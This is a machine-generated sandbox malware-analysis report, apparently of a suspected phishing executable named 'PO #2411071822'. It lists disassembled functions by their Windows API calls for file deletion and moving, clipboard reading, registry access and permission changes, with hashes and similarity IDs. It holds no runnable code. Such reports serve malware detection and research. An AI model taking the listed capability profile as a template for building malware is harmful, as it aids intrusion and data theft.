                                                                                                              • Instruction Fuzzy Hash: 6981AF71D01209AFDF11DFA4CC44AEF7B79EF04308F04412AF914A6261E7798EA5DB6A
                                                                                                              Function 004260DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00425FA6,?), ref: 00426ED8
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00425FA6,?), ref: 00426EF1
                                                                                                                • Part of subcall function 0042725E: __wsplitpath.LIBCMT ref: 0042727B
                                                                                                                • Part of subcall function 0042725E: __wsplitpath.LIBCMT ref: 0042728E
                                                                                                                • Part of subcall function 004272CB: GetFileAttributesW.KERNEL32(?,00426019), ref: 004272CC
                                                                                                              • _wcscat.LIBCMT ref: 00426149
                                                                                                              • _wcscat.LIBCMT ref: 00426167
                                                                                                              • __wsplitpath.LIBCMT ref: 0042618E
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004261A4
                                                                                                              • _wcscpy.LIBCMT ref: 00426209
                                                                                                              • _wcscat.LIBCMT ref: 0042621C
                                                                                                              • _wcscat.LIBCMT ref: 0042622F
                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0042625D
                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0042626E
                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00426289
                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00426298
                                                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 004262AD
                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004262BE
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004262E1
                                                                                                              • FindClose.KERNEL32(00000000), ref: 004262FD
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0042630B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                              • String ID: \*.*
                                                                                                              • API String ID: 1917200108-1173974218
                                                                                                              • Opcode ID: af655f05f44ad8bf047b86a3295b21f450f348cd66c70540b9488c7376c3a1b1
                                                                                                              • Instruction ID: 9e88157afc279bc06807e70e644b1ddc3b3380a2b59e3f1a0f2a1d8cdcb5f9c9
                                                                                                              • Opcode Fuzzy Hash: af655f05f44ad8bf047b86a3295b21f450f348cd66c70540b9488c7376c3a1b1
                                                                                                              • Instruction Fuzzy Hash: 2C510372E0812C9ACB21EB91DC44DEB77BCAF05304F4601EBE545E3141EE7997498FA9
                                                                                                              Function 00436B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenClipboard.USER32(0047DC00), ref: 00436B36
                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00436B44
                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00436B4C
                                                                                                              • CloseClipboard.USER32 ref: 00436B58
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00436B74
                                                                                                              • CloseClipboard.USER32 ref: 00436B7E
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00436B93
                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00436BA0
                                                                                                              • GetClipboardData.USER32(00000001), ref: 00436BA8
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00436BB5
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00436BE9
                                                                                                              • CloseClipboard.USER32 ref: 00436CF6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 3222323430-0
                                                                                                              • Opcode ID: 7c597f93a44a75b19b3edef53a5923754fac2c51e037acff1bbefc6a3784bc56
                                                                                                              • Instruction ID: 4a61b74ccefdc5440c9ac0f308c33e636b884ac26c9dc1a7c892c384945a86ae
                                                                                                              • Opcode Fuzzy Hash: 7c597f93a44a75b19b3edef53a5923754fac2c51e037acff1bbefc6a3784bc56
                                                                                                              • Instruction Fuzzy Hash: 5851A171B00212ABD301AF65DD56F6F77A8AF48B00F01512EF546D62E1EFB4E8058B6B
                                                                                                              Function 0042F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0042F62B
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0042F67F
                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042F6A4
                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042F6BB
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042F6E2
                                                                                                              • __swprintf.LIBCMT ref: 0042F72E
                                                                                                              • __swprintf.LIBCMT ref: 0042F767
                                                                                                              • __swprintf.LIBCMT ref: 0042F7BB
                                                                                                                • Part of subcall function 0040172B: __woutput_l.LIBCMT ref: 00401784
                                                                                                              • __swprintf.LIBCMT ref: 0042F809
                                                                                                              • __swprintf.LIBCMT ref: 0042F858
                                                                                                              • __swprintf.LIBCMT ref: 0042F8A7
                                                                                                              • __swprintf.LIBCMT ref: 0042F8F6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                              • API String ID: 835046349-2428617273
                                                                                                              • Opcode ID: a9175551811bdf632419344dcfa1db1c1786ae6da4e3db23c450d3667aba6e1b
                                                                                                              • Instruction ID: 9618ecabcf766efc6063624dc24117395cee3344a93d51d1c21fd77ab2bbb748
                                                                                                              • Opcode Fuzzy Hash: a9175551811bdf632419344dcfa1db1c1786ae6da4e3db23c450d3667aba6e1b
                                                                                                              • Instruction Fuzzy Hash: A0A12FB2508354ABC311EBA5C885DAFB7ECAF98704F800D2EF585C7191EB74D949CB62
                                                                                                              Function 00431B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00431B50
                                                                                                              • _wcscmp.LIBCMT ref: 00431B65
                                                                                                              • _wcscmp.LIBCMT ref: 00431B7C
                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00431B8E
                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431BA8
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431BC0
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431BCB
                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431BE7
                                                                                                              • _wcscmp.LIBCMT ref: 00431C0E
                                                                                                              • _wcscmp.LIBCMT ref: 00431C25
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431C37
                                                                                                              • SetCurrentDirectoryW.KERNEL32(004939FC), ref: 00431C55
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431C5F
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431C6C
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431C7C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                              • String ID: *.*
                                                                                                              • API String ID: 1803514871-438819550
                                                                                                              • Opcode ID: 6c728dbeca2bd4a13863b71fe1cc99ad92940aa6273e05d5833c37ad32509ed2
                                                                                                              • Instruction ID: 118eeefd5dcfc97d5b5104ecb08de349bf2ec8e9988bdaad24a72205ff1d2914
                                                                                                              • Opcode Fuzzy Hash: 6c728dbeca2bd4a13863b71fe1cc99ad92940aa6273e05d5833c37ad32509ed2
                                                                                                              • Instruction Fuzzy Hash: A4319531A402196ADF149FA1DC49BDE77ACAF0A314F1051A7F815E31A0EBB8DA458A6C
                                                                                                              Function 00431C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00431CAB
                                                                                                              • _wcscmp.LIBCMT ref: 00431CC0
                                                                                                              • _wcscmp.LIBCMT ref: 00431CD7
                                                                                                                • Part of subcall function 00426BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00426BEF
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431D06
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431D11
                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431D2D
                                                                                                              • _wcscmp.LIBCMT ref: 00431D54
                                                                                                              • _wcscmp.LIBCMT ref: 00431D6B
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431D7D
                                                                                                              • SetCurrentDirectoryW.KERNEL32(004939FC), ref: 00431D9B
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431DA5
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431DB2
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431DC2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                              • String ID: *.*
                                                                                                              • API String ID: 1824444939-438819550
                                                                                                              • Opcode ID: 208b8f8af8fd6d5fbfeb61c83a21825e2e6cbc0b4d0486e80f4cb2b8d792284f
                                                                                                              • Instruction ID: 26e8418e2169bb5723a691a7dda2e17d7c2b996a2b29377f759053d36d396ead
                                                                                                              • Opcode Fuzzy Hash: 208b8f8af8fd6d5fbfeb61c83a21825e2e6cbc0b4d0486e80f4cb2b8d792284f
                                                                                                              • Instruction Fuzzy Hash: 8C31D631A006197ACF14AFA1DC49BDF77ACAF4A324F105567F811A31A0EB78EE458A5C
                                                                                                              Function 003E7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset
                                                                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                                              • API String ID: 2102423945-2023335898
                                                                                                              • Opcode ID: 7588d55374c390737bbf741f1adfa50d3d9262a7fa70400db275d03d534f5868
                                                                                                              • Instruction ID: 5af5393bac52822670935677e53f68707ed90b699881bbdb72cf439e09c7c3ab
                                                                                                              • Opcode Fuzzy Hash: 7588d55374c390737bbf741f1adfa50d3d9262a7fa70400db275d03d534f5868
                                                                                                              • Instruction Fuzzy Hash: 7982E271D04269DBCF25CF95C8807EEB7B1BF44310F25826AD819AB381E774AD89CB85
                                                                                                              Function 0043091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocalTime.KERNEL32(?), ref: 004309DF
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 004309EF
                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004309FB
                                                                                                              • __wsplitpath.LIBCMT ref: 00430A59
                                                                                                              • _wcscat.LIBCMT ref: 00430A71
                                                                                                              • _wcscat.LIBCMT ref: 00430A83
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00430A98
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00430AAC
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00430ADE
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00430AFF
                                                                                                              • _wcscpy.LIBCMT ref: 00430B0B
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00430B4A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                              • String ID: *.*
                                                                                                              • API String ID: 3566783562-438819550
                                                                                                              • Opcode ID: 9a5955a4829b76f46caefe5f089bc48272cab0a93a7c76f75827e4f58549b05a
                                                                                                              • Instruction ID: 9735b3f765de1dfb7aa6946eaacf1e0523efd89e9a93503a0e6ba4a8064b0227
                                                                                                              • Opcode Fuzzy Hash: 9a5955a4829b76f46caefe5f089bc48272cab0a93a7c76f75827e4f58549b05a
                                                                                                              • Instruction Fuzzy Hash: B06159B25042059FD710EF61C850AAFB3E8FF89314F044A2EF98997251EB39E945CB96
                                                                                                              Function 0041A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0041ABD7
                                                                                                                • Part of subcall function 0041ABBB: GetLastError.KERNEL32(?,0041A69F,?,?,?), ref: 0041ABE1
                                                                                                                • Part of subcall function 0041ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0041A69F,?,?,?), ref: 0041ABF0
                                                                                                                • Part of subcall function 0041ABBB: HeapAlloc.KERNEL32(00000000,?,0041A69F,?,?,?), ref: 0041ABF7
                                                                                                                • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0041AC0E
                                                                                                                • Part of subcall function 0041AC56: GetProcessHeap.KERNEL32(00000008,0041A6B5,00000000,00000000,?,0041A6B5,?), ref: 0041AC62
                                                                                                                • Part of subcall function 0041AC56: HeapAlloc.KERNEL32(00000000,?,0041A6B5,?), ref: 0041AC69
                                                                                                                • Part of subcall function 0041AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0041A6B5,?), ref: 0041AC7A
                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0041A6D0
                                                                                                              • _memset.LIBCMT ref: 0041A6E5
                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0041A704
                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0041A715
                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0041A752
                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0041A76E
                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0041A78B
                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0041A79A
                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041A7A1
                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0041A7C2
                                                                                                              • CopySid.ADVAPI32(00000000), ref: 0041A7C9
                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0041A7FA
                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0041A820
                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0041A834
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3996160137-0
                                                                                                              • Opcode ID: 88dda771fa4c2536434b8012cd65cf2af0ad7dd34057a42c332e27993482da41
                                                                                                              • Instruction ID: 68c6b8ce17194c3d73c326b21fc1ad7abf1ae9aa5e8cb316df5eb164d17c70fa
                                                                                                              • Opcode Fuzzy Hash: 88dda771fa4c2536434b8012cd65cf2af0ad7dd34057a42c332e27993482da41
                                                                                                              • Instruction Fuzzy Hash: 6D515C71E01209ABDF009F91DC44AEFBBB9FF04314F04812AE911A6291E778DA56CB69
                                                                                                              Function 003E6F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: H$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$HHH H
                                                                                                              • API String ID: 0-2359093945
                                                                                                              • Opcode ID: 7f51216112ea3fa48274f4dfe249890935c95ca04b786d36d30d765a367f12c6
                                                                                                              • Instruction ID: 3a29c6093308e7e21ce5d891f8287f3990c49aad5c9c542e8fa23a2a6b0f077c
                                                                                                              • Opcode Fuzzy Hash: 7f51216112ea3fa48274f4dfe249890935c95ca04b786d36d30d765a367f12c6
                                                                                                              • Instruction Fuzzy Hash: BC728E71E042699BDF25CF59C8807AEB7B5BF48310F14816BE809EB2C0EB749E41DB95
                                                                                                              Function 004263F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00425FA6,?), ref: 00426ED8
                                                                                                                • Part of subcall function 004272CB: GetFileAttributesW.KERNEL32(?,00426019), ref: 004272CC
                                                                                                              • _wcscat.LIBCMT ref: 00426441
                                                                                                              • __wsplitpath.LIBCMT ref: 0042645F
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00426474
                                                                                                              • _wcscpy.LIBCMT ref: 004264A3
                                                                                                              • _wcscat.LIBCMT ref: 004264B8
                                                                                                              • _wcscat.LIBCMT ref: 004264CA
                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004264DA
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004264EB
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00426506
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                              • String ID: \*.*
                                                                                                              • API String ID: 2643075503-1173974218
                                                                                                              • Opcode ID: 1bfee344242286bf20c92628bbf17f5383b325c95981145e23caa0fc3bcbfdf6
                                                                                                              • Instruction ID: 4b7243bd86be8852219a7948602e11938d0fb3edd44910dbfc1f28bf8b3271f5
                                                                                                              • Opcode Fuzzy Hash: 1bfee344242286bf20c92628bbf17f5383b325c95981145e23caa0fc3bcbfdf6
                                                                                                              • Instruction Fuzzy Hash: 3731A2B2908384AAC721EFA49885ADB77DCAF56304F40092FF5D9C3141EA39D549876B
                                                                                                              Function 004431BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00443C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0044328E
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0044332D
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004433C5
                                                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00443604
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00443611
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1240663315-0
                                                                                                              • Opcode ID: 745a0bd3680d835b173d549e2c722ea1063a28b0217bc93411d141f2faeea9c6
                                                                                                              • Instruction ID: 6bc85d29d98a7d23e91c7d7c8af05596765c52ef70440e6258ca09194de717da
